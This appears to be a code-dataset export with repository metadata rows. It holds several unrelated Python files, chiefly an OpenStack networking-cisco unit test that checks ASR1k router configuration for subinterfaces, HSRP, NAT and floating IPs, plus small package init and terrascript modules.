| 32.779528 | 88 | 0.649291 | 451 | 4,163 | 5.767184 | 0.150776 | 0.086505 | 0.053825 | 0.053825 | 0.893887 | 0.893887 | 0.893887 | 0.852749 | 0.836217 | 0.836217 | 0 | 0.0445 | 0.233485 | 4,163 | 126 | 89 | 33.039683 | 0.770605 | 0 | 0 | 0.633028 | 0 | 0 | 0.131636 | 0.060533 | 0 | 0 | 0 | 0 | 0.045872 | 1 | 0.045872 | false | 0 | 0.082569 | 0 | 0.12844 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
2eaa61ee4197b6441b8f0a07311b161ad49c65b0 | 34 | py | Python | ketting/__init__.py | Branthalt/blockchain | f345b7ec3b5a9c930a691366ee5adfec8d2a096a | [
"MIT"
] | 1 | 2019-04-14T06:01:11.000Z | 2019-04-14T06:01:11.000Z | tibc/__init__.py | manparvesh/tibc | 8fcb233e2e33c2c90708e6bde0fb68a36a18f963 | [
"MIT"
] | 1 | 2018-03-11T20:54:42.000Z | 2018-07-07T19:32:39.000Z | tibc/__init__.py | manparvesh/tibc | 8fcb233e2e33c2c90708e6bde0fb68a36a18f963 | [
"MIT"
] | 1 | 2018-06-09T07:59:37.000Z | 2018-06-09T07:59:37.000Z | from .blockchain import Blockchain | 34 | 34 | 0.882353 | 4 | 34 | 7.5 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.088235 | 34 | 1 | 34 | 34 | 0.967742 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
2efc1d216bf6ff422ca112a94547a8b52048d335 | 27,950 | py | Python | networking_cisco/tests/unit/cisco/cfg_agent/test_asr1k_routing_driver.py | armando7santana/Networking-Cisco | 6f281bec239c0ae186490e434ce7794117880c69 | [
"Apache-2.0"
] | 1 | 2019-01-19T09:12:49.000Z | 2019-01-19T09:12:49.000Z | networking_cisco/tests/unit/cisco/cfg_agent/test_asr1k_routing_driver.py | armando7santana/Networking-Cisco | 6f281bec239c0ae186490e434ce7794117880c69 | [
"Apache-2.0"
] | null | null | null | networking_cisco/tests/unit/cisco/cfg_agent/test_asr1k_routing_driver.py | armando7santana/Networking-Cisco | 6f281bec239c0ae186490e434ce7794117880c69 | [
"Apache-2.0"
] | null | null | null | # Copyright 2014 Cisco Systems, Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import sys
import mock
import netaddr
from oslo_config import cfg
from oslo_utils import uuidutils
from neutron.tests import base
from networking_cisco.plugins.cisco.cfg_agent.device_drivers.asr1k import (
asr1k_routing_driver as driver)
from networking_cisco.plugins.cisco.cfg_agent.device_drivers.asr1k import (
asr1k_snippets as snippets)
from networking_cisco.plugins.cisco.cfg_agent.device_drivers.csr1kv import (
cisco_csr1kv_snippets as csr_snippets)
from networking_cisco.plugins.cisco.cfg_agent.device_drivers.csr1kv import (
iosxe_routing_driver as iosxe_driver)
from networking_cisco.plugins.cisco.cfg_agent.service_helpers import (
routing_svc_helper)
from networking_cisco.plugins.cisco.common import cisco_constants
from networking_cisco.plugins.cisco.extensions import ha
from networking_cisco.plugins.cisco.extensions import routerrole
from networking_cisco.tests.unit.cisco.cfg_agent import cfg_agent_test_support
sys.modules['ncclient'] = mock.MagicMock()
_uuid = uuidutils.generate_uuid
DEV_NAME_LEN = iosxe_driver.IosXeRoutingDriver.DEV_NAME_LEN
HA_INFO = 'ha_info'
ROUTER_ROLE_ATTR = routerrole.ROUTER_ROLE_ATTR
ROUTER_ROLE_HA_REDUNDANCY = cisco_constants.ROUTER_ROLE_HA_REDUNDANCY
class ASR1kRoutingDriver(base.BaseTestCase,
cfg_agent_test_support.CfgAgentTestSupportMixin):
def setUp(self):
super(ASR1kRoutingDriver, self).setUp()
cfg.CONF.set_override('enable_multi_region', False, 'multi_region')
device_params = self.prepare_hosting_device_params()
self.driver = driver.ASR1kRoutingDriver(**device_params)
self.driver._ncc_connection = mock.MagicMock()
self.driver._check_response = mock.MagicMock(return_value=True)
self.driver._check_acl = mock.MagicMock(return_value=False)
def tearDown(self):
super(ASR1kRoutingDriver, self).tearDown()
self.driver._ncc_connection.reset_mock()
def _create_test_routers(self, is_user_visible=True):
self.router, ports = self.prepare_router_data(
is_user_visible=is_user_visible)
self.ri = routing_svc_helper.RouterInfo(self.router['id'],
self.router)
self.ha_priority = self.router[ha.DETAILS][ha.PRIORITY]
self.vrf = ('nrouter-' + self.router['id'])[:DEV_NAME_LEN]
# router port on external network, i.e., gateway port
self.ext_gw_port = self.router['gw_port']
self.ext_gw_port['ip_info'] = {
'subnet_id': self.ext_gw_port['subnets'][0]['id'],
'is_primary': True,
'ip_cidr': self.ext_gw_port['subnets'][0]['cidr']
}
self.ext_phy_infc = (
self.ext_gw_port['hosting_info']['physical_interface'])
self.vlan_ext = self.ext_gw_port['hosting_info']['segmentation_id']
self.ext_gw_upstream_ip = self.ext_gw_port['subnets'][0]['gateway_ip']
self.ext_gw_ip = self.ext_gw_port['fixed_ips'][0]['ip_address']
self.ext_gw_ip_cidr = self.ext_gw_port['subnets'][0]['cidr']
self.ext_gw_ip_mask = str(
netaddr.IPNetwork(self.ext_gw_ip_cidr).netmask)
port_ha_info = self.ext_gw_port['ha_info']
self.ext_gw_ha_group = port_ha_info['group']
# router port on internal network
self.int_port = ports[0]
self.int_port['ip_info'] = {
'subnet_id': self.int_port['subnets'][0]['id'],
'is_primary': True,
'ip_cidr': self.int_port['subnets'][0]['cidr']
}
self.int_port['change_details'] = {
'new_ports': [self.int_port],
'current_ports': [self.int_port],
'old_ports': [],
'former_ports': []
}
self.int_phy_infc = self.int_port['hosting_info']['physical_interface']
self.vlan_int = self.int_port['hosting_info']['segmentation_id']
self.int_gw_ip = self.int_port['fixed_ips'][0]['ip_address']
self.int_gw_ip_cidr = self.int_port['subnets'][0]['cidr']
self.int_gw_ip_mask = str(
netaddr.IPNetwork(self.int_gw_ip_cidr).netmask)
port_ha_info = self.int_port['ha_info']
self.int_gw_ip_vip = (
port_ha_info['ha_port']['fixed_ips'][0]['ip_address'])
self.int_gw_ha_group = port_ha_info['group']
self.floating_ip = '19.4.0.6'
self.fixed_ip = '35.4.0.20'
def _create_test_global_routers(self, num_ext_subnets=1, subnet_index=0):
# global router and its ports
self.global_router, gl_ports = self.prepare_router_data(
is_global=True, num_ext_subnets=num_ext_subnets)
self.ha_priority = self.global_router[ha.DETAILS][ha.PRIORITY]
self.ri_global = routing_svc_helper.RouterInfo(
self.global_router['id'], self.global_router)
self.gl_port = gl_ports[0]
self.gl_port['ip_info'] = {
'subnet_id': self.gl_port['subnets'][0]['id'],
'is_primary': True,
'ip_cidr': self.gl_port['subnets'][0]['cidr']
}
self.ext_phy_infc = self.gl_port['hosting_info']['physical_interface']
self.vlan_ext = self.gl_port['hosting_info']['segmentation_id']
self.gl_port_ip = self.gl_port['fixed_ips'][subnet_index]['ip_address']
self.gl_port_ip_cidr = self.gl_port['subnets'][subnet_index]['cidr']
self.gl_port_ip_mask = str(
netaddr.IPNetwork(self.gl_port_ip_cidr).netmask)
port_ha_info = self.gl_port['ha_info']
self.gl_port_vip = (
port_ha_info['ha_port']['fixed_ips'][subnet_index]['ip_address'])
self.gl_port_ha_group = port_ha_info['group']
def assert_edit_run_cfg(self, snippet_name, args):
if args:
confstr = snippet_name % args
else:
confstr = snippet_name
self.driver._ncc_connection.edit_config.assert_any_call(
target='running', config=confstr)
def _assert_number_of_edit_run_cfg_calls(self, num):
self.assertEqual(num,
self.driver._ncc_connection.edit_config.call_count)
def _generate_hsrp_cfg_args(self, subintfc, group, priority, vip, vlan):
return (subintfc,
group, priority,
group, vip,
group,
group, group, vlan)
def test_internal_network_added(self):
self._create_test_routers()
self.driver.internal_network_added(self.ri, self.int_port)
sub_interface = self.int_phy_infc + '.' + str(self.vlan_int)
cfg_args_sub = (sub_interface, self.vlan_int, self.vrf, self.int_gw_ip,
self.int_gw_ip_mask)
self.assert_edit_run_cfg(
snippets.CREATE_SUBINTERFACE_WITH_ID, cfg_args_sub)
cfg_args_hsrp = self._generate_hsrp_cfg_args(
sub_interface, self.int_gw_ha_group, self.ha_priority,
self.int_gw_ip_vip, self.vlan_int)
self.assert_edit_run_cfg(
snippets.SET_INTC_ASR_HSRP_EXTERNAL, cfg_args_hsrp)
def test_internal_network_added_with_multi_region(self):
cfg.CONF.set_override('enable_multi_region', True, 'multi_region')
self._create_test_routers()
is_multi_region_enabled = cfg.CONF.multi_region.enable_multi_region
self.assertEqual(True, is_multi_region_enabled)
region_id = cfg.CONF.multi_region.region_id
vrf = self.vrf + "-" + region_id
self.driver.internal_network_added(self.ri, self.int_port)
sub_interface = self.int_phy_infc + '.' + str(self.vlan_int)
cfg_args_sub = (sub_interface, region_id, self.vlan_int, vrf,
self.int_gw_ip, self.int_gw_ip_mask)
self.assert_edit_run_cfg(
snippets.CREATE_SUBINTERFACE_REGION_ID_WITH_ID, cfg_args_sub)
cfg_args_hsrp = self._generate_hsrp_cfg_args(
sub_interface, self.int_gw_ha_group, self.ha_priority,
self.int_gw_ip_vip, self.vlan_int)
self.assert_edit_run_cfg(
snippets.SET_INTC_ASR_HSRP_EXTERNAL, cfg_args_hsrp)
def test_internal_network_added_global_router(self):
self._create_test_global_routers()
self.driver.internal_network_added(self.ri_global, self.gl_port)
sub_interface = self.ext_phy_infc + '.' + str(self.vlan_ext)
cfg_args_sub = (sub_interface, self.vlan_ext,
self.gl_port_ip, self.gl_port_ip_mask)
self.assert_edit_run_cfg(
snippets.CREATE_SUBINTERFACE_EXTERNAL_WITH_ID, cfg_args_sub)
cfg_args_hsrp = self._generate_hsrp_cfg_args(
sub_interface, self.gl_port_ha_group, self.ha_priority,
self.gl_port_vip, self.vlan_ext)
self.assert_edit_run_cfg(
snippets.SET_INTC_ASR_HSRP_EXTERNAL, cfg_args_hsrp)
def test_internal_network_added_global_router_secondary_subnet(self):
self._create_test_global_routers(num_ext_subnets=2, subnet_index=1)
self.gl_port['ip_info']['subnet_id'] = self.gl_port['subnets'][1]['id']
self.gl_port['ip_info']['ip_cidr'] = self.gl_port['subnets'][1]['cidr']
self.gl_port['ip_info']['is_primary'] = False
self.driver.internal_network_added(self.ri_global, self.gl_port)
sub_interface = self.ext_phy_infc + '.' + str(self.vlan_ext)
cfg_args_sub = (sub_interface, self.gl_port_ip, self.gl_port_ip_mask)
self.assert_edit_run_cfg(
snippets.SET_INTERFACE_SECONDARY_IP, cfg_args_sub)
cfg_args_hsrp = (sub_interface, self.gl_port_ha_group,
self.gl_port_vip)
self.assert_edit_run_cfg(
snippets.SET_INTC_ASR_SECONDARY_HSRP_EXTERNAL, cfg_args_hsrp)
def test_internal_network_added_global_router_with_multi_region(self):
cfg.CONF.set_override('enable_multi_region', True, 'multi_region')
self._create_test_global_routers()
is_multi_region_enabled = cfg.CONF.multi_region.enable_multi_region
self.assertEqual(True, is_multi_region_enabled)
region_id = cfg.CONF.multi_region.region_id
self.driver.internal_network_added(self.ri_global, self.gl_port)
sub_interface = self.ext_phy_infc + '.' + str(self.vlan_ext)
cfg_args_sub = (sub_interface, region_id, self.vlan_ext,
self.gl_port_ip, self.gl_port_ip_mask)
self.assert_edit_run_cfg(
snippets.CREATE_SUBINTERFACE_EXT_REGION_ID_WITH_ID, cfg_args_sub)
cfg_args_hsrp = self._generate_hsrp_cfg_args(
sub_interface, self.gl_port_ha_group, self.ha_priority,
self.gl_port_vip, self.vlan_ext)
self.assert_edit_run_cfg(
snippets.SET_INTC_ASR_HSRP_EXTERNAL, cfg_args_hsrp)
def test_internal_network_added_global_router_with_multi_region_sec_sn(
self):
cfg.CONF.set_override('enable_multi_region', True, 'multi_region')
self._create_test_global_routers(num_ext_subnets=2, subnet_index=1)
is_multi_region_enabled = cfg.CONF.multi_region.enable_multi_region
self.assertEqual(True, is_multi_region_enabled)
self.gl_port['ip_info']['subnet_id'] = self.gl_port['subnets'][1]['id']
self.gl_port['ip_info']['ip_cidr'] = self.gl_port['subnets'][1]['cidr']
self.gl_port['ip_info']['is_primary'] = False
self.driver.internal_network_added(self.ri_global, self.gl_port)
sub_interface = self.ext_phy_infc + '.' + str(self.vlan_ext)
cfg_args_sub = (sub_interface, self.gl_port_ip, self.gl_port_ip_mask)
self.assert_edit_run_cfg(
snippets.SET_INTERFACE_SECONDARY_IP, cfg_args_sub)
cfg_args_hsrp = (sub_interface, self.gl_port_ha_group,
self.gl_port_vip)
self.assert_edit_run_cfg(
snippets.SET_INTC_ASR_SECONDARY_HSRP_EXTERNAL, cfg_args_hsrp)
def _make_test_router_non_ha(self):
self._create_test_routers()
self.ri.router[ha.ENABLED] = False
del self.ri.router[ha.DETAILS]
del self.ext_gw_port[HA_INFO]
del self.int_port[HA_INFO]
def test_external_network_added_non_ha(self):
self._make_test_router_non_ha()
self.driver.external_gateway_added(self.ri, self.ext_gw_port)
sub_interface = self.ext_phy_infc + '.' + str(self.vlan_ext)
self.assert_edit_run_cfg(csr_snippets.ENABLE_INTF, sub_interface)
cfg_params_nat = (self.vrf + '_nat_pool', self.ext_gw_ip,
self.ext_gw_ip, self.ext_gw_ip_mask)
self.assert_edit_run_cfg(snippets.CREATE_NAT_POOL, cfg_params_nat)
def test_external_network_added_user_visible_router(self):
self._create_test_routers()
self.driver.external_gateway_added(self.ri, self.ext_gw_port)
sub_interface = self.ext_phy_infc + '.' + str(self.vlan_ext)
self.assert_edit_run_cfg(csr_snippets.ENABLE_INTF, sub_interface)
cfg_params_nat = (self.vrf + '_nat_pool', self.ext_gw_ip,
self.ext_gw_ip, self.ext_gw_ip_mask)
self.assert_edit_run_cfg(snippets.CREATE_NAT_POOL, cfg_params_nat)
def test_external_network_added_redundancy_router(self):
self._create_test_routers(is_user_visible=False)
self.driver.external_gateway_added(self.ri, self.ext_gw_port)
sub_interface = self.ext_phy_infc + '.' + str(self.vlan_ext)
self.assert_edit_run_cfg(csr_snippets.ENABLE_INTF, sub_interface)
cfg_params_nat = (self.vrf + '_nat_pool', self.ext_gw_ip,
self.ext_gw_ip, self.ext_gw_ip_mask)
self.assert_edit_run_cfg(snippets.CREATE_NAT_POOL, cfg_params_nat)
def test_external_network_added_with_multi_region(self):
cfg.CONF.set_override('enable_multi_region', True, 'multi_region')
self._create_test_routers()
is_multi_region_enabled = cfg.CONF.multi_region.enable_multi_region
self.assertEqual(True, is_multi_region_enabled)
region_id = cfg.CONF.multi_region.region_id
vrf = self.vrf + "-" + region_id
self.driver.external_gateway_added(self.ri, self.ext_gw_port)
sub_interface = self.ext_phy_infc + '.' + str(self.vlan_ext)
self.assert_edit_run_cfg(csr_snippets.ENABLE_INTF, sub_interface)
cfg_params_nat = (vrf + '_nat_pool', self.ext_gw_ip,
self.ext_gw_ip, self.ext_gw_ip_mask)
self.assert_edit_run_cfg(snippets.CREATE_NAT_POOL, cfg_params_nat)
def test_external_gateway_removed_non_ha(self):
self._make_test_router_non_ha()
self.driver.external_gateway_removed(self.ri, self.ext_gw_port)
cfg_params_nat = (self.vrf + '_nat_pool', self.ext_gw_ip,
self.ext_gw_ip, self.ext_gw_ip_mask)
self.assert_edit_run_cfg(snippets.DELETE_NAT_POOL, cfg_params_nat)
sub_interface = self.ext_phy_infc + '.' + str(self.vlan_ext)
cfg_params_remove_route = (self.vrf,
sub_interface, self.ext_gw_upstream_ip)
self.assert_edit_run_cfg(snippets.REMOVE_DEFAULT_ROUTE_WITH_INTF,
cfg_params_remove_route)
def test_external_gateway_removed_user_visible_router(self):
self._create_test_routers()
self.driver.external_gateway_removed(self.ri, self.ext_gw_port)
cfg_params_nat = (self.vrf + '_nat_pool', self.ext_gw_ip,
self.ext_gw_ip, self.ext_gw_ip_mask)
self.assert_edit_run_cfg(snippets.DELETE_NAT_POOL, cfg_params_nat)
sub_interface = self.ext_phy_infc + '.' + str(self.vlan_ext)
cfg_params_remove_route = (self.vrf,
sub_interface, self.ext_gw_upstream_ip)
self.assert_edit_run_cfg(snippets.REMOVE_DEFAULT_ROUTE_WITH_INTF,
cfg_params_remove_route)
def test_external_gateway_removed_redundancy_router(self):
self._create_test_routers(is_user_visible=False)
self.driver.external_gateway_removed(self.ri, self.ext_gw_port)
cfg_params_nat = (self.vrf + '_nat_pool', self.ext_gw_ip,
self.ext_gw_ip, self.ext_gw_ip_mask)
self.assert_edit_run_cfg(snippets.DELETE_NAT_POOL, cfg_params_nat)
sub_interface = self.ext_phy_infc + '.' + str(self.vlan_ext)
cfg_params_remove_route = (self.vrf,
sub_interface, self.ext_gw_upstream_ip)
self.assert_edit_run_cfg(snippets.REMOVE_DEFAULT_ROUTE_WITH_INTF,
cfg_params_remove_route)
def test_external_gateway_removed_with_multi_region(self):
cfg.CONF.set_override('enable_multi_region', True, 'multi_region')
self._create_test_routers()
is_multi_region_enabled = cfg.CONF.multi_region.enable_multi_region
self.assertEqual(True, is_multi_region_enabled)
region_id = cfg.CONF.multi_region.region_id
vrf = self.vrf + "-" + region_id
self.driver.external_gateway_removed(self.ri, self.ext_gw_port)
cfg_params_nat = (vrf + '_nat_pool', self.ext_gw_ip,
self.ext_gw_ip, self.ext_gw_ip_mask)
self.assert_edit_run_cfg(snippets.DELETE_NAT_POOL, cfg_params_nat)
sub_interface = self.ext_phy_infc + '.' + str(self.vlan_ext)
cfg_params_remove_route = (vrf,
sub_interface, self.ext_gw_upstream_ip)
self.assert_edit_run_cfg(snippets.REMOVE_DEFAULT_ROUTE_WITH_INTF,
cfg_params_remove_route)
def test_external_gateway_removed_global_router(self):
self._create_test_global_routers()
self.driver._interface_exists = mock.MagicMock(return_value=True)
self.driver.external_gateway_removed(self.ri_global, self.gl_port)
sub_interface = self.ext_phy_infc + '.' + str(self.vlan_ext)
self.assert_edit_run_cfg(
csr_snippets.REMOVE_SUBINTERFACE, sub_interface)
def test_floating_ip_added(self):
self._create_test_routers()
self.driver.floating_ip_added(self.ri, self.ext_gw_port,
self.floating_ip, self.fixed_ip)
self._assert_number_of_edit_run_cfg_calls(1)
cfg_params_floating = (self.fixed_ip, self.floating_ip, self.vrf,
self.ext_gw_ha_group, self.vlan_ext)
self.assert_edit_run_cfg(snippets.SET_STATIC_SRC_TRL_NO_VRF_MATCH,
cfg_params_floating)
def test_floating_ip_added_with_multi_region(self):
cfg.CONF.set_override('enable_multi_region', True, 'multi_region')
self._create_test_routers()
is_multi_region_enabled = cfg.CONF.multi_region.enable_multi_region
self.assertEqual(True, is_multi_region_enabled)
region_id = cfg.CONF.multi_region.region_id
vrf = self.vrf + "-" + region_id
self.driver.floating_ip_added(self.ri, self.ext_gw_port,
self.floating_ip, self.fixed_ip)
self._assert_number_of_edit_run_cfg_calls(1)
cfg_params_floating = (self.fixed_ip, self.floating_ip, vrf,
self.ext_gw_ha_group, self.vlan_ext)
self.assert_edit_run_cfg(snippets.SET_STATIC_SRC_TRL_NO_VRF_MATCH,
cfg_params_floating)
def test_floating_ip_removed(self):
self._create_test_routers()
self.driver.floating_ip_removed(self.ri, self.ext_gw_port,
self.floating_ip, self.fixed_ip)
self._assert_number_of_edit_run_cfg_calls(1)
cfg_params_floating = (self.fixed_ip, self.floating_ip, self.vrf,
self.ext_gw_ha_group, self.vlan_ext)
self.assert_edit_run_cfg(snippets.REMOVE_STATIC_SRC_TRL_NO_VRF_MATCH,
cfg_params_floating)
def test_floating_ip_removed_with_multi_region(self):
cfg.CONF.set_override('enable_multi_region', True, 'multi_region')
self._create_test_routers()
is_multi_region_enabled = cfg.CONF.multi_region.enable_multi_region
self.assertEqual(True, is_multi_region_enabled)
region_id = cfg.CONF.multi_region.region_id
vrf = self.vrf + "-" + region_id
self.driver.floating_ip_removed(self.ri, self.ext_gw_port,
self.floating_ip, self.fixed_ip)
self._assert_number_of_edit_run_cfg_calls(1)
cfg_params_floating = (self.fixed_ip, self.floating_ip, vrf,
self.ext_gw_ha_group, self.vlan_ext)
self.assert_edit_run_cfg(snippets.REMOVE_STATIC_SRC_TRL_NO_VRF_MATCH,
cfg_params_floating)
def test_driver_enable_internal_network_NAT(self):
self._create_test_routers()
self.driver.enable_internal_network_NAT(self.ri, self.int_port,
self.ext_gw_port)
self._assert_number_of_edit_run_cfg_calls(4)
acl_name = '%(acl_prefix)s_%(vlan)s_%(port)s' % {
'acl_prefix': 'neutron_acl',
'vlan': self.vlan_int,
'port': self.int_port['id'][:8]}
net = netaddr.IPNetwork(self.int_gw_ip_cidr).network
net_mask = netaddr.IPNetwork(self.int_gw_ip_cidr).hostmask
cfg_params_create_acl = (acl_name, net, net_mask)
self.assert_edit_run_cfg(
csr_snippets.CREATE_ACL, cfg_params_create_acl)
pool_name = "%s_nat_pool" % self.vrf
cfg_params_dyn_trans = (acl_name, pool_name, self.vrf)
self.assert_edit_run_cfg(
snippets.SET_DYN_SRC_TRL_POOL, cfg_params_dyn_trans)
sub_interface_int = self.int_phy_infc + '.' + str(self.vlan_int)
sub_interface_ext = self.int_phy_infc + '.' + str(self.vlan_ext)
self.assert_edit_run_cfg(csr_snippets.SET_NAT,
(sub_interface_int, 'inside'))
self.assert_edit_run_cfg(csr_snippets.SET_NAT,
(sub_interface_ext, 'outside'))
def test_driver_enable_internal_network_NAT_with_multi_region(self):
cfg.CONF.set_override('enable_multi_region', True, 'multi_region')
self._create_test_routers()
is_multi_region_enabled = cfg.CONF.multi_region.enable_multi_region
self.assertEqual(True, is_multi_region_enabled)
region_id = cfg.CONF.multi_region.region_id
vrf = self.vrf + "-" + region_id
self.driver.enable_internal_network_NAT(self.ri, self.int_port,
self.ext_gw_port)
self._assert_number_of_edit_run_cfg_calls(4)
acl_name = '%(acl_prefix)s_%(region_id)s_%(vlan)s_%(port)s' % {
'acl_prefix': 'neutron_acl',
'region_id': region_id,
'vlan': self.vlan_int,
'port': self.int_port['id'][:8]}
net = netaddr.IPNetwork(self.int_gw_ip_cidr).network
net_mask = netaddr.IPNetwork(self.int_gw_ip_cidr).hostmask
cfg_params_create_acl = (acl_name, net, net_mask)
self.assert_edit_run_cfg(
csr_snippets.CREATE_ACL, cfg_params_create_acl)
pool_name = "%s_nat_pool" % vrf
cfg_params_dyn_trans = (acl_name, pool_name, vrf)
self.assert_edit_run_cfg(
snippets.SET_DYN_SRC_TRL_POOL, cfg_params_dyn_trans)
sub_interface_int = self.int_phy_infc + '.' + str(self.vlan_int)
sub_interface_ext = self.int_phy_infc + '.' + str(self.vlan_ext)
self.assert_edit_run_cfg(csr_snippets.SET_NAT,
(sub_interface_int, 'inside'))
self.assert_edit_run_cfg(csr_snippets.SET_NAT,
(sub_interface_ext, 'outside'))
def test_driver_disable_internal_network_NAT(self):
self._create_test_routers()
self.driver.disable_internal_network_NAT(self.ri, self.int_port,
self.ext_gw_port)
self._assert_number_of_edit_run_cfg_calls(3)
acl_name = '%(acl_prefix)s_%(vlan)s_%(port)s' % {
'acl_prefix': 'neutron_acl',
'vlan': self.vlan_int,
'port': self.int_port['id'][:8]}
pool_name = "%s_nat_pool" % self.vrf
cfg_params_dyn_trans = (acl_name, pool_name, self.vrf)
self.assert_edit_run_cfg(
snippets.REMOVE_DYN_SRC_TRL_POOL, cfg_params_dyn_trans)
self.assert_edit_run_cfg(csr_snippets.REMOVE_ACL, acl_name)
def test_driver_disable_internal_network_NAT_with_multi_region(self):
cfg.CONF.set_override('enable_multi_region', True, 'multi_region')
self._create_test_routers()
is_multi_region_enabled = cfg.CONF.multi_region.enable_multi_region
self.assertEqual(True, is_multi_region_enabled)
region_id = cfg.CONF.multi_region.region_id
vrf = self.vrf + "-" + region_id
self.driver.disable_internal_network_NAT(self.ri, self.int_port,
self.ext_gw_port)
self._assert_number_of_edit_run_cfg_calls(3)
acl_name = '%(acl_prefix)s_%(region_id)s_%(vlan)s_%(port)s' % {
'acl_prefix': 'neutron_acl',
'region_id': region_id,
'vlan': self.vlan_int,
'port': self.int_port['id'][:8]}
pool_name = "%s_nat_pool" % vrf
cfg_params_dyn_trans = (acl_name, pool_name, vrf)
self.assert_edit_run_cfg(
snippets.REMOVE_DYN_SRC_TRL_POOL, cfg_params_dyn_trans)
self.assert_edit_run_cfg(csr_snippets.REMOVE_ACL, acl_name)
def test_enable_interface_user_visible_router(self):
self._create_test_routers()
self.driver.enable_router_interface(self.ri, self.ext_gw_port)
sub_interface = self.ext_phy_infc + '.' + str(self.vlan_ext)
self.assert_edit_run_cfg(csr_snippets.ENABLE_INTF, sub_interface)
def test_enable_interface_redundancy_router(self):
self._create_test_routers(is_user_visible=False)
self.driver.enable_router_interface(self.ri, self.ext_gw_port)
sub_interface = self.ext_phy_infc + '.' + str(self.vlan_ext)
self.assert_edit_run_cfg(csr_snippets.ENABLE_INTF, sub_interface)
def test_disable_interface_user_visible_router(self):
self._create_test_routers()
self.driver.disable_router_interface(self.ri, self.ext_gw_port)
sub_interface = self.ext_phy_infc + '.' + str(self.vlan_ext)
self.assert_edit_run_cfg(csr_snippets.DISABLE_INTF, sub_interface)
def test_disable_interface_redundancy_router(self):
self._create_test_routers(is_user_visible=False)
self.driver.disable_router_interface(self.ri, self.ext_gw_port)
sub_interface = self.ext_phy_infc + '.' + str(self.vlan_ext)
self.assert_edit_run_cfg(csr_snippets.DISABLE_INTF, sub_interface)
def test_get_configuration(self):
self._create_test_routers()
self.driver._get_running_config = mock.MagicMock()
self.driver.get_configuration()
self.driver._get_running_config.assert_called_once_with(split=False)
| 46.274834 | 79 | 0.674275 | 3,852 | 27,950 | 4.421599 | 0.069055 | 0.036167 | 0.036461 | 0.04697 | 0.854685 | 0.834077 | 0.799319 | 0.765324 | 0.753464 | 0.737318 | 0 | 0.003077 | 0.232665 | 27,950 | 603 | 80 | 46.351575 | 0.791066 | 0.025689 | 0 | 0.646316 | 0 | 0 | 0.057174 | 0.005732 | 0 | 0 | 0 | 0 | 0.149474 | 1 | 0.075789 | false | 0 | 0.031579 | 0.002105 | 0.111579 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
2578a81e80aeb39a95eb07db18a641f8b9b0d2d9 | 60 | py | Python | influx_logging/__init__.py | jainsau/influxdb_logging | d908757cbd55cf19e73d7ff8a6c5713d368f9cb0 | [
"MIT"
] | 8 | 2018-02-22T12:40:25.000Z | 2021-09-20T04:05:05.000Z | influx_logging/__init__.py | jainsau/influxdb_logging | d908757cbd55cf19e73d7ff8a6c5713d368f9cb0 | [
"MIT"
] | 4 | 2018-02-23T13:28:27.000Z | 2021-06-03T22:10:00.000Z | influx_logging/__init__.py | jainsau/influxdb_logging | d908757cbd55cf19e73d7ff8a6c5713d368f9cb0 | [
"MIT"
] | 6 | 2018-03-25T00:36:40.000Z | 2021-11-17T16:55:14.000Z | from .handler import InfluxHandler, BufferingInfluxHandler
| 20 | 58 | 0.866667 | 5 | 60 | 10.4 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.1 | 60 | 2 | 59 | 30 | 0.962963 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
25ad9e44659a59e0c2cd49cc158367181bdbf2f1 | 645 | py | Python | terrascript/launchdarkly/d.py | mjuenema/python-terrascript | 6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d | [
"BSD-2-Clause"
] | 507 | 2017-07-26T02:58:38.000Z | 2022-01-21T12:35:13.000Z | terrascript/launchdarkly/d.py | mjuenema/python-terrascript | 6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d | [
"BSD-2-Clause"
] | 135 | 2017-07-20T12:01:59.000Z | 2021-10-04T22:25:40.000Z | terrascript/launchdarkly/d.py | mjuenema/python-terrascript | 6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d | [
"BSD-2-Clause"
] | 81 | 2018-02-20T17:55:28.000Z | 2022-01-31T07:08:40.000Z | # terrascript/launchdarkly/d.py
# Automatically generated by tools/makecode.py ()
import warnings
warnings.warn(
"using the 'legacy layout' is deprecated", DeprecationWarning, stacklevel=2
)
import terrascript
class launchdarkly_environment(terrascript.Data):
pass
class launchdarkly_feature_flag(terrascript.Data):
pass
